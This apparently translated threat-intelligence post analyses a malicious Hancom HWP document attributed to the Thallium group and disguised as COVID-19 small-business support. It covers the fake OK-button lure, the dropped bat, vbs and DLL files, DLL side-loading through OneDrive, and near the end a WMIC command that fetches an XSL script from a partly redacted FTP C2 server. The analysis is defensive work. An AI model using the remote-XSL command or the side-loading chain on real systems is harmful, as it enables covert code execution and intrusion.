thallium group

Thallium Attacks HWP Disguised as Small Business Support Information related to COVID-19


In this article, I will describe the analysis of the malicious HWP document file behind the recently discovered Thallium Group, and introduce what kind of threat case it is similar to.

The malicious document has the following information, and as of the last modified date, it was produced around November 2020.

First, if you look at the internal structure of HWP, you can see that 3 OLE objects are included in the BinData location, and there are 2 png image files.

thallium hwp

First, the’BIN0001.png’ file is a normal image and is designed like a notice screen shown in the HWP document file, and the’BIN0002.png’ file is an image with a [OK] button.

So, when a malicious HWP document was executed, it was used as a fake message window, and a subtle trick was used to induce the user to execute itself by linking the malicious OLE object to the [OK] button image.


Looking at the internal structure of each OLE, you can see that the author accessed the’apisecurity.bat’ file from the’DefaultAccounts’ account and configured a malicious DLL file with the file name of’apisecurity.key’. And the’apisecurity.vbs’ script is used to induce execution.

thallium hwp

In fact, when the document is executed, it shows a fake message window (bundled object) made of an OLE image file, as if the document contents were not displayed correctly, and the user himself is convinced to click the [OK] button.

thallium hwp

When malicious HWP document is executed, OLE object is created in the path [C:\Users\[User Account]\AppData\Local\Temp] as 3 files as follows.

  • apisecurity.bat
  • apisecurity.key
  • apisecurity.vbs

If you are deceived by the fake message window and click the [OK] part while holding down the <Ctrl> key, a security warning window appears according to the version of Hancom Office. If allowed, the’apisecurity.vbs’ script is attempted to be called.

However, if you check the hyperlink connected to the [OK] button among the bundled objects, you can see that the absolute path is incorrectly set to the location of [c:\users\[user account]\\apisecurity.vbs].


Because the path of creation of’apisecurity.vbs’ was different, the infection operation was not reproduced normally in the analysis environment, but we are constantly checking whether there is a problem with the operating system or the Hancom Office version.

Meanwhile, the vbs file is composed of the following commands inside, and it works depending on whether OneDrive is installed or not.

If there is a’Resources.pri ‘ file in the [C:\Users\[User Account]\AppData\Local\Microsoft\OneDrive] path, rename the’apisecurity.key ‘ file to’xmllite.dll ‘ in the’OneDrive ‘ path. Move.

And if there is no’api.patch’ file in the’OneDrive’ path [Error: Authentication failed.] Open a message window, call the’apisecurity.bat’ file, and use the’taskkill.exe’ command to’hwp.exe’ Kill the process.


The’apisecurity.key’ file that performs the final malicious function is a 32-bit DLL file with a build time of ‘2020-11-12 16:52:45 (KST)’. You can compare that the malicious HWP document was produced before the final date.

If the condition of the’OneDrive ‘ folder path is met and the file is created as’xmllite.dll’ , the malicious’xmllite.dll’ file in the same path is loaded with the’XmlLite.dll’ when executing the normal’OneDrive.exe’ program. It creates and executes a’.bat’ file, and deletes itself to delete the execution trace.

Therefore, this attack is called’DLL Planting’ or’DLL Side-Loading’ technique as a subtle automatic execution method using OneDrive.


In addition, malicious files attempt to communicate with the FTP server for command control (C2) through a string encoded with code, and additional malicious actions are performed through the’XSL Script Processing’ technique.

wmic os get /format:ftp://u:[email protected][.]co/beta/usoprive



ftp://u:[email protected][.]co/beta/usoprive